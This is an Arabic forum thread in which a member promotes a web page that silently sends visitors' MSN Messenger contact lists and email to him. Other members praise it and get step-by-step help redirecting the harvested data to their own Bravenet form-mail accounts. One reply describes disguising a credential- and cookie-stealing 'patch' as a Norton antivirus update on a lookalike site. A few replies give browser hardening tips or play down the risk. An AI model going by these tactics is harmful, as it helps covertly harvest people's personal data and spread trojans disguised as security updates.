• 0
محمد بدوي

اخطر صفحة في الانترنت لمستخدمي الماسنجر!

سؤال

  • 0

السلام عليكم ورحمة الله وبركاته

صممت صفحة في الانترنت كفيله بارسال معلومات مستخدمي MSN Messenger الي عند فتحها

www.geocities.com/easysoft2000

وهي مجربة وتعمل جيدا

فاذا كان هذا الموضوع مهما فدعونا نتناقش عنه قليلا

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

43 إجابة على هذا السؤال .

  • 0

السلام عليكم ورحمة الله وبركاته

صممت صفحة في الانترنت كفيله بارسال معلومات مستخدمي MSN Messenger الي عند فتحها

www.geocities.com/easysoft2000

وهي مجربة وتعمل جيدا

فاذا كان هذا الموضوع مهما فدعونا نتناقش عنه قليلا

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اهلين اخي نبهان ...

بالنسبة لهذه الصفحة ...

كنت قد صممت مثل هيك صفحات في السابق ... وهي تعتمد بشكل كلي على زراعة باتش داخل ال Index وهذا الباتش قد تكون له عدة وظائف منها سرقة الكوكيز ومنها سرقة كلمات السر او او ...

طبعا على حسب الكود الذي تم صنع الباتش به ...

ولكن الفن ليس في صنع الباتش بحد ذاته ... ولكن في الصفحة ..

يعني ممكن انت تجعل هالصفحة متل صفحة الياهو او اي موقع مشهور تماما ... وحتى العنوان ممكن يكون قريب ايضا من عنوان الموقع الاساسي حتى تتم الخدعة ...

تصور مثلا ان اعطيك عنوانا للياهو ويفتح لك موقع الياهو نفسه ... ولكن العنوان فيه تغير كلمة او ربما حرف واحد ... والنتيجة هي عندما تفتح هذه الصفحة يتم سرقة كل شيء ...

النقطة الثانية الهامة هي اخفاء الباتش هذا عن برامج الانتي فيروس .. علما ان صفحتك هذه مكشوفة للذين عندهم برنامج فيروسات ...

وهذا اهم ما في صناعة الباتش برأيي ......

انا ساعطيك طريقة سهلة جدا لاخفاء اي باتش تريده من دون وضعه في صفحة انترنت .... شوف

قم بدمج الباتش بأي تحديث لبرامج النورتون مثلا .... وضعه في صفحتك ..

والآن ماذا سيحدث .. عندما يحمل الضحية هذا التحديث سوف يقوم برنامج النورتون بتحديث قاعدة البيانات لديه ولكن لن تعمل البيانات الجديدة الا بعد ان يقوم الضحية بإعادة الاقلاع ... وبالتالي يكون قد عمل الباتش عمله وتم سرقة كل شي .....

وشي آخر وهو ان هذا الشخص لن يشك ( بعد اعادة الاقلاع واكتشاف ان لديه باتش ) ان الباتش هذا من عندك أبدا لانه يقوم بالتحديث وهذا يعني ان يمكن ان يكون الباتش قديم في جهازه .....

ما رأيك بهذه النقطة الغبية في النورتون .....

جربنا مثل هذه الامور كثيرا ......

واما طريقة الحماية من هذه الثغرة فلم اجد حل لها الا تحديث قاعة بيانات برامج الفيروسات من مواقع غير مشبوهة .....

او ان تنصب أكثر من برنامج فيروس على جهازك ........

علما ان بعض برامج الفيروسات الغبية ربما لا تكتشف مثل هذا الباتش ابدا ......

ولكن انتبه ... بالنسبة لصناعة الباتش .... لان الغلط فيه قد يكون قاتلا ...

لك تحياتي (f) محمــ قطـ MK ــان ــد (f)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

والله الموضوع روعه

المضلع الصفحه ناجحه 100%

وانت يا اخوي محمد قطان الانتي فايروس تعرف السكربت نفسه

قبل ما ينزل الباتش(هذا اذكان الباتش exe)

البرنامج

godwill

اما الهكس فهي تمشي

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0


Welcome to Bravenet.com

Please wait ...

You will be redirected to the main page in moments.









0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكرا للاخ "رميان" , "المنذر" , "(l)(f)()()()()(f)(l)" , "بيل غيتس :)" على الزيارة :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكرا لك اخ نبهان والله رااااااااااائع ..... وفنااااااااان ....

مية المية ;) ;)

محمــ قطـ MK ـان ــد (f) (f)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

نبهان المضلع

Can you add me to your messenger by this e-mail address

[email protected]

and thank you

(f) (f)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم

الاخ نبهان

كيف يمكنني ان اجعل هذا الكود يرسل الى بريدي القائمة التي عثر عليها حيث انني حاولت ولكن لم استطع

وشكر

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

هنالك عدة طرق بس اسهل طريقة ان تضيف هذا السطر الى الكود السابق:


....
....



....
....

لكن المشكلة هنا انني ساستلم نفس الرسالة. :rolleyes:

هذه كما قلت اسهل الطرق لكنها قد لا تناسب البعض فاذا كنت تريد ان تحصل على استقلالتك فسجل في www.bravenet.com واحصل على فورم ايميل وغير الرقم الخاص بي 3908979072 الى الرقم الخاص بك

هذا هو كل الموضوع .

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم

ماعرفت اسوي بريد في الموقع الي قلت عنه

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

نجحت وسويت بريد

بس اعتقد الكود فيه شي ناقص

انا عندي ملينيوم 2000

هو يرسل لي رساله عن الي يدخلون الموقع ولكن

اذا دخلت الموقع مايطلع السكربت

يعني مايرحب بالزائر ويقول له ان هذي معلوماته

كيف نسويها

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اضف السطر التالي الى الكود الخاص بك :


.....
.....


.....
.....

بعد زيارة صفحتك الاولى سيتحول الزائر الى صفحتى الخاصة باظهار معلومات الزائر ( ليس ارسالها ) .

يمكنك نقل الزائر الى اي صفحة بتغيير القيمة www.geocities.com/easysoft2000/confirm.htm الى عنوان الصفحة المطلوبة والتي يراعى في تصميمها ان تكون موافقه لتصميم صفحتى اذا اردت ان تقوم باظهار بيانات الزائر المرسلة , زر هذه الصفحة وخذ الكود الخاص بها عن طريق عرض المصدر . www.geocities.com/easysoft2000/confirm.htm

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اود ان اضيف هنا للاخوة الذي يسجلون عند BRAVENET ان لا يقوموا فقط بتغيير الرقم بل والصفحة التي سيتم ارسال المعلومات اليها :


action="http://pub46.bravenet.com/emailfwd/senddata.php"
change it to yours for example to:
action="http://pub47.bravenet.com/emailfwd/senddata.php"

لن تعمل الصفحة بدون هذين التعديلين .

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اظن ان اغلب الاخوة قد ادركوا فعلا خطورة تلك الصفحة على الخصوصية على الاقل ;لكن ما هو الحل ؟

اسهل الحلول هو تغيير اعدادات الاكسبلورر ; كيف ؟

1- اذهب الى قائمة الادوات و انقر على خيارات الانترنت

2- انقر على تبويب الامن او الخصوصية ( لا ادري ما ترجمتها بالعربية تماما لان النسخة التي عندي ليس عربية ) عموما هي "Security" .

3- اضغط على مفتاح "" اعدادات مخصصة" "Security Setting" او شيء مثل هذا القبيل .

4- اسحب الى اسفل الى ان تجد "Script ActiveX control marked safe for scripting" "ادوات تحكم امنه" .

5- اجعل الخيار على "اعلام" "Prompt" او حتى "ايقاف" "Disabled" .

*** وبهذا تضمن ظهور رسالة لتحذيرك عند دخول صفحة تحتوي ذلك النص السركبت , اذا اخترت "اعلام" , او عدم ظهورها مطلقا اذا اخترت "ايقاف".

*** اعرف انك ستعاني كثيرا من هذه الرسالة عند دخولك لصفحة الهوتميل لكن لا تقلق فهو امن في ذلك الموضع فاضغط موافق .

حظا موفقا ,,,

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الاخ نبهان

لقد قمت بتغير الرقم الخاص بك الى رقمي واجريت التعديل الذي ذكرته ارجو ان تبين الى ما هي المشكلة في ذلك

وشكر

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكرا شكرا

كل شي تمام

بس فيه مشكلتين

اهم شي

الرساله الي توصل لي الاسامي المكتوبه بالعربي تطلع حرووف وارقام مادري ليه..وش منه تعتقد

2- الاخطاء كثيره في الصفحه

وشكرا لك

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكرا شكرا

كل شي تمام

بس فيه مشكلتين

اهم شي

الرساله الي توصل لي الاسامي المكتوبه بالعربي تطلع حرووف وارقام مادري ليه..وش منه تعتقد

2- الاخطاء كثيره في الصفحه

وشكرا لك

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي الكريم : الصفحة قد راجعتها اكثر من مرة وقد عانيت من هذه الاخطاء كثير ( الذي تكلمت عنها ) لكن اذا اردت الكود الاخير للصفحة فاذهب الي الصفحة وعاين المصدر لكن لا تنسى ان تضغط STOP بسرعة لحظة دخولك الصفحة او تعدل اعدادات الاكسبلورر بتاعك.

المهم ستجد الكود النهائي هنالك .

هذه الصفحة مرة اخرى :

www.geocities.com/easysoft2000

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

لا أرى في الموضوع أي ثغرة تستحق القلق .....

الموضوع كله هو أن هذا هو Messager APIs وهو معد من ميكرسوفت ولنفس الغرض الذي إستخدمته له وأيظا ليعمل مع برامج الفيجول بيزيك

ليس عليه أي غبار ..

فمثلا يمكن أن تلاحظ أنه مستخدم في صفحة الهوتميل عندما يظهر لك

الأشخاص الموجودين ...

هذا API مشروع وممكن أن تنزل ملف المساعدة لبرمجة مثل هذة الأشياء مع الماسنجر من صفحة تنزيل الماسنجر

وهذة وصلة ممكن تنزله من هنـــــــــــــــا

وهذا مقطع من مقالة فيه

The Messenger object can be embedded in an HTML page as an object or used as part of a Microsoft® Visual Basic® application

وهناك شرح للخاصية Item التي إستخدمتها في المثال وهذ هو


Public WithEvents MsgrUIA As MessengerAPI.Messenger
Public MsgrContacts As MessengerAPI.IMessengerContacts

Private Sub btnItem_Click()
On Error Resume Next
FormItem.Show vbModal 'Get user input
If bDialogCancel = False Then
MsgBox("Contacts Item " & lItem & " = " & _
MsgrContacts.Item(lItem).SigninName & " : " & _
MsgrContacts.Item(lItem).FriendlyName)
End If
ErrorTrap ("Contact.Item") 'Error handling routine
End Sub

يعني أنه ليس هناك أي مشكلة وأقصى شيئ ممكن أن يحصل عليه صاحب الصفحة هو البريد الإلكتروني لك وقائمة الأصدقاء والموجود منهم الأن وما شابه واعتقد أن مثل هذة ليست أسرار يعني أنه لن يستطيع من معرفتها من تحطيم الجهاز أو اخذ الأرقام السرية لك وما شابه

-------------------

بالنسبة كيف تخزن المعلومات المرسلة من الكود السابقة فيمكن أن تعد صفحة تستقبل المعلومات من الكود السابق تعدها ب asp وتضعها في موقع يدعم asp وتغير في الأعلى الصفة Action = "????.asp"

وتستخدم

form.submit

وسوف ترسل المعلومات للصفحة ويمكن أن تكتب الكود الذي يقوم بخزنها في ملف أكسس أو ما شابه

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بس هذا الموضوع جديد بالنسبه لنا

وحلو..يكفي انك تعرف منهو مضاف عند هالشخص

الى نبهان..الاسامي الي بالعربي ماتوصل عندي الا على شكل ارقام ورموز..هل تعرف حل المشكله..انا ناسخ نفس الكود

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الاخ عبدالرحمن المعزاب تكلم كلام جميل جدا.

لكن اليك هذا السؤال , الا ترى ان في اخذ هذه المعلومات انتهاك لخصوصيتك ؟ واذا كان جوابك نعم ,اليس هذا كاف لان نعتبر هذه ثغرة .

صصمت هذا الكود في صفحة وب لان معظم المستخدمين لا يدركون اي خطورة من زيارة صفحات الوب , كما استغلال تلك النقطة في الماسنجر بتلك الطريقة هي اقل خطر يمكن عمله .

فباستخدام تلك الخاصية في الماسنجر تستطيع بتصميم برنامج سهل لنقل بالفيجوال بيسك ( كونه الاسهل ) ان تصمم برنامج ينشر نفسه حول العالم بثواني , فاذا تم ارسال رسائل باسمك ( النك نيم ) الى اصحابك باسمائم المستعارة مع ارفاق البرنامج لنفسه فهل تعتقد ان اصحابك سيترردون في فتح الملف المرفق . لا شك انها ستكون كارثة خاصة اذا كان برنامجك فيروس خبيث .

هذه هو ما اردت ان انبه اليه في مقالتي الاولى "ادخل فقد يعدبك الموضوع" http://www.arabteam2000.com/vb/showthread....p?threadid=6255 والتي لم تلقى تجاوب حتى صممت تلك الصفحة .

فهذه هو كل الموضوع, وشكرا مرة اخرى . :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

مرحبا ..

بصراحه الموضوع جميل .. ولكن على قول عبد الرحمن .. ليست تلك السريه ...

بس الاخ المضلع في شي بالكود ماني فاهمه

MsgrData=Replace(MsgrData,"%$#",vbCrLf)

ماالمقصود ب %$# ؟؟

مشكور مقدما

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي الكريم :

لو اخذت النسخة الاخيرة من الكود عن طريق معاينة مصدر الصفحة, لوجدت ان ذلك السطر لم يعد موجودا.

لكن دعني اشرح لك ذلك السطر :

بعد اخذ المعلومات عن طريق جافا سكريبت كود وترتيبها في متغير نصي , يتم وضع تلك العلامة "%$#" بين كل سطر واخر , في الحقيقة عندما كتبت ذلك الكود لم اكن اعلم ان "n" تفي بالمطلوب , تقوم دالة المعمولة بالجافا سكريبت بارجاع ذلك المتغير النصي , طبعا مع العلامة المميزة "%$#" , فكما تلاحظ ان السطر السابق يقوم بابدال كل علامة "%$#" في المتغير النصي ب"VbVrLf" والتي تعطي سطر جديد.

جرب احذف السطر او اعمل علامة ( ' ) امامه للدلالة على انه تعليق ولاحظ كيف ستكون المعلومات في سطر واحد وبهذا يستحيل فهمها

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

سلام

مدري ليه الايميل مايطلع لي ويطلع بداله undefne

اتمنى تلقولي حل

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكرا اخ نبهان الطريقة واضحة مية بالمية ........

كفيت ووفيت .....

لك تحياتي ...... (f) (f)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
زوار
This topic is now closed to further replies.

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .